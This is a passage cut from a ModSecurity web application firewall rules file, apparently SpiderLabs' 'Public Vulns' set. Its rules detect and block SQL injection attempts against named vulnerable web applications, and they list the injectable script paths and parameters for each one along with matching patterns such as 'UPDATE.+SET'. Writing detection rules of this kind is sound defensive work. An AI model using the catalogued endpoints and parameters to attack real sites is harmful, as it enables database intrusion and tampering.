UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3321'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006134) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Softwebs Nepal Ananda Real Estate SQL Injection Attempt -- list.asp agent UPDATE SecRule REQUEST_LINE "@contains /list.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006134,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Softwebs Nepal Ananda Real Estate SQL Injection Attempt -- list.asp agent UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3001'" SecRule &TX:'/SQL_INJECTION.*ARGS:agent/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Softwebs Nepal Ananda Real Estate SQL Injection Attempt -- list.asp agent UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006485) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php UPDATE SecRule REQUEST_LINE "@contains /game_listing.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006485,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4078'" SecRule QUERY_STRING|REQUEST_BODY "(?i:.+UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004384) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Triexa SonicMailer Pro SQL Injection Attempt -- index.php list UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004384,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Triexa SonicMailer Pro SQL Injection Attempt -- index.php list UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3457'" SecRule &TX:'/SQL_INJECTION.*ARGS:list/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Triexa SonicMailer Pro SQL Injection Attempt -- index.php list UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004821) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Sphider SQL Injection Attempt -- search.php category UPDATE SecRule REQUEST_LINE "@contains /search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004821,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Sphider SQL Injection Attempt -- search.php category UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/20131'" SecRule &TX:'/SQL_INJECTION.*ARGS:category/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Sphider SQL Injection Attempt -- search.php category UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005157) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines UPDATE SecRule REQUEST_LINE "@contains /rss/show_webfeed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005157,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22282'" SecRule &TX:'/SQL_INJECTION.*ARGS:wcHeadlines/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004827) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Super Link Exchange Script SQL Injection Attempt -- directory.php cat UPDATE SecRule REQUEST_LINE "@contains /directory.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004827,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Super Link Exchange Script SQL Injection Attempt -- directory.php cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/435166/30/4680/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Super Link Exchange Script SQL Injection Attempt -- directory.php cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006638) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- sendarticle.asp UPDATE SecRule REQUEST_LINE "@contains /sendarticle.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006638,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- sendarticle.asp UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/453462/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:.+UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- sendarticle.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006644) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- printarticle.asp UPDATE SecRule REQUEST_LINE "@contains /printarticle.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006644,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- printarticle.asp UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/453462/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:.+UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- printarticle.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006650) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- index.asp ID UPDATE SecRule REQUEST_LINE "@contains /index.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006650,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- index.asp ID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/453462/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- index.asp ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006656) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- preferences.asp ID UPDATE SecRule REQUEST_LINE "@contains /preferences.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006656,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- preferences.asp ID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/453462/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Superfreaker Studios UPublisher SQL Injection Attempt -- preferences.asp ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005572) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ThWboard SQL Injection Attempt -- index.php board UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005572,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ThWboard SQL Injection Attempt -- index.php board UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3124'" SecRule REQUEST_LINE "@contains board[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ThWboard SQL Injection Attempt -- index.php board UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006008) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php lastname UPDATE SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006008,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php lastname UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'" SecRule &TX:'/SQL_INJECTION.*ARGS:lastname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php lastname UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006014) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php firstname UPDATE SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006014,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php firstname UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'" SecRule &TX:'/SQL_INJECTION.*ARGS:firstname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php firstname UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006020) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php passwordOld UPDATE SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006020,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php passwordOld UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'" SecRule &TX:'/SQL_INJECTION.*ARGS:passwordOld/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php passwordOld UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006026) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php passwordNew UPDATE SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006026,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php passwordNew UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'" SecRule &TX:'/SQL_INJECTION.*ARGS:passwordNew/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php passwordNew UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006032) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php id UPDATE SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006032,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006038) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php language UPDATE SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006038,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php language UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'" SecRule &TX:'/SQL_INJECTION.*ARGS:language/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php language UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006044) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php defaultLetter UPDATE SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006044,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php defaultLetter UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'" SecRule &TX:'/SQL_INJECTION.*ARGS:defaultLetter/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php defaultLetter UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006050) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php newuserPass UPDATE SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006050,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php newuserPass UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'" SecRule &TX:'/SQL_INJECTION.*ARGS:newuserPass/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php newuserPass UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006056) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php newuserType UPDATE SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006056,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php newuserType UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'" SecRule &TX:'/SQL_INJECTION.*ARGS:newuserType/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php newuserType UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006062) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php newuserEmail UPDATE SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006062,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php newuserEmail UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'" SecRule &TX:'/SQL_INJECTION.*ARGS:newuserEmail/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- user.php newuserEmail UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006068) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- search.php goTo UPDATE SecRule REQUEST_LINE "@contains /search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006068,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- search.php goTo UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'" SecRule &TX:'/SQL_INJECTION.*ARGS:goTo/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- search.php goTo UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006074) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- search.php search UPDATE SecRule REQUEST_LINE "@contains /search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006074,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- search.php search UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'" SecRule &TX:'/SQL_INJECTION.*ARGS:search/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- search.php search UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006080) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- save.php groupAddName UPDATE SecRule REQUEST_LINE "@contains /save.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006080,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- save.php groupAddName UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21870'" SecRule &TX:'/SQL_INJECTION.*ARGS:groupAddName/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS The Address Book SQL Injection Attempt -- save.php groupAddName UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004874) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Turuncu Portal SQL Injection Attempt -- h_goster.asp id UPDATE SecRule REQUEST_LINE "@contains /h_goster.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004874,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Turuncu Portal SQL Injection Attempt -- h_goster.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22591'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Turuncu Portal SQL Injection Attempt -- h_goster.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004677) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Tyger Bug Tracking System (TygerBT) SQL Injection Attempt -- ViewReport.php bug UPDATE SecRule REQUEST_LINE "@contains /ViewReport.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004677,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Tyger Bug Tracking System (TygerBT) SQL Injection Attempt -- ViewReport.php bug UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/24385'" SecRule &TX:'/SQL_INJECTION.*ARGS:bug/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Tyger Bug Tracking System (TygerBT) SQL Injection Attempt -- ViewReport.php bug UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004682) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Tyger Bug Tracking System (TygerBT) SQL Injection Attempt -- ViewBugs.php s UPDATE SecRule REQUEST_LINE "@contains /ViewBugs.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004682,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Tyger Bug Tracking System (TygerBT) SQL Injection Attempt -- ViewBugs.php s UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22799'" SecRule &TX:'/SQL_INJECTION.*ARGS:s/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Tyger Bug Tracking System (TygerBT) SQL Injection Attempt -- ViewBugs.php s UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005238) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Unique Ads (UDS) SQL Injection Attempt -- banner.php bid UPDATE SecRule REQUEST_LINE "@contains /banner.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005238,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Unique Ads (UDS) SQL Injection Attempt -- banner.php bid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/457667/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:bid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Unique Ads (UDS) SQL Injection Attempt -- banner.php bid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006891) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Uapplication UPhotoGallery SQL Injection Attempt -- slideshow.asp ci UPDATE SecRule REQUEST_LINE "@contains /slideshow.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006891,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Uapplication UPhotoGallery SQL Injection Attempt -- slideshow.asp ci UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21319'" SecRule &TX:'/SQL_INJECTION.*ARGS:ci/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Uapplication UPhotoGallery SQL Injection Attempt -- slideshow.asp ci UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006897) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Uapplication UPhotoGallery SQL Injection Attempt -- thumbnails.asp ci UPDATE SecRule REQUEST_LINE "@contains /thumbnails.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006897,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Uapplication UPhotoGallery SQL Injection Attempt -- thumbnails.asp ci UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21319'" SecRule &TX:'/SQL_INJECTION.*ARGS:ci/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Uapplication UPhotoGallery SQL Injection Attempt -- thumbnails.asp ci UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005008) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ublog Reload SQL Injection Attempt -- badword.asp UPDATE SecRule REQUEST_LINE "@contains /badword.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005008,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Ublog Reload SQL Injection Attempt -- badword.asp UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22382'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET 